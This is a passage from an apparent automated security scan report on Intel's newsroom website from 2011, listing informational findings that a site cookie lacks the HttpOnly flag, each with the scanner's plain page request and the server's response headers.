Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:17 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313934363b33382c313936333b33382c313936303b33382c313935393b33382c313931393b31342c323032353b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:19 GMT; Path=/
X-JAL: 138
Content-Language: en-US
CacheHit: D=146166 t=1296947657370210
X-JSL: D=146172 t=1296947657370210
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.133. http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/26/forty-young-innovators-named-intel-science-talent-search-2011-finalists  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/01/26/forty-young-innovators-named-intel-science-talent-search-2011-finalists

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313931393b33382c313935393b33382c313936333b33382c313538363b33382c313936303b33382c313934363b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:16 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/intel_newsroom/blog/2011/01/26/forty-young-innovators-named-intel-science-talent-search-2011-finalists HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:14 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313931393b33382c313935393b33382c313936333b33382c313538363b33382c313936303b33382c313934363b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:16 GMT; Path=/
X-JAL: 79
Content-Language: en-US
CacheHit: D=88390 t=1296947654948936
X-JSL: D=88395 t=1296947654948936
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.134. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313935393b33382c313934363b33382c313936303b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:11 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:09 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313935393b33382c313934363b33382c313936303b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:11 GMT; Path=/
X-JAL: 66
Content-Language: en-US
CacheHit: D=161784 t=1296947649952957
X-JSL: D=161790 t=1296947649952957
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.135. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936303b33382c313935393b33382c313934363b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:11 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:09 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936303b33382c313935393b33382c313934363b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:11 GMT; Path=/
X-JAL: 38
Content-Language: en-US
CacheHit: D=46892 t=1296947649661306
X-JSL: D=46898 t=1296947649661306
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.136. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313934363b33382c313936303b33382c313935393b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:11 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:09 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313934363b33382c313936303b33382c313935393b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:11 GMT; Path=/
X-JAL: 40
Content-Language: en-US
CacheHit: D=133429 t=1296947649850972
X-JSL: D=133434 t=1296947649850972
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.137. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936333b33382c313936303b33382c313935393b33382c313934363b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:13 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:11 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936333b33382c313936303b33382c313935393b33382c313934363b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:13 GMT; Path=/
X-JAL: 61
Content-Language: en-US
CacheHit: D=69382 t=1296947651605241
X-JSL: D=69388 t=1296947651605241
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.138. http://newsroom.intel.com/community/intel_newsroom/free_press/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/free_press/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313934363b33382c313936333b33382c313935393b33382c313936303b33382c313931393b33382c313538363b31342c323032353b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:19 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/intel_newsroom/free_press/ HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:17 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313934363b33382c313936333b33382c313935393b33382c313936303b33382c313931393b33382c313538363b31342c323032353b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:19 GMT; Path=/
X-JAL: 81
Content-Language: en-US
CacheHit: D=107940 t=1296947657290454
X-JSL: D=107945 t=1296947657290454
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.139. http://newsroom.intel.com/community/pt_br  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/pt_br

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313931393b33382c313936303b33382c313935393b33382c313934363b33382c313936333b31342c323032373b31342c323031363b31342c323030343b31342c323031303b31342c323030353b31342c323030363b31342c323030373b31342c323031313b31342c323032353b; Expires=Mon, 07-Mar-2011 23:14:42 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/pt_br HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:39 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313931393b33382c313936303b33382c313935393b33382c313934363b33382c313936333b31342c323032373b31342c323031363b31342c323030343b31342c323031303b31342c323030353b31342c323030363b31342c323030373b31342c323031313b31342c323032353b; Expires=Mon, 07-Mar-2011 23:14:42 GMT; Path=/
X-JAL: 573
Content-Language: en-US
CacheHit: D=662753 t=1296947679796756
X-JSL: D=662759 t=1296947679796756
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
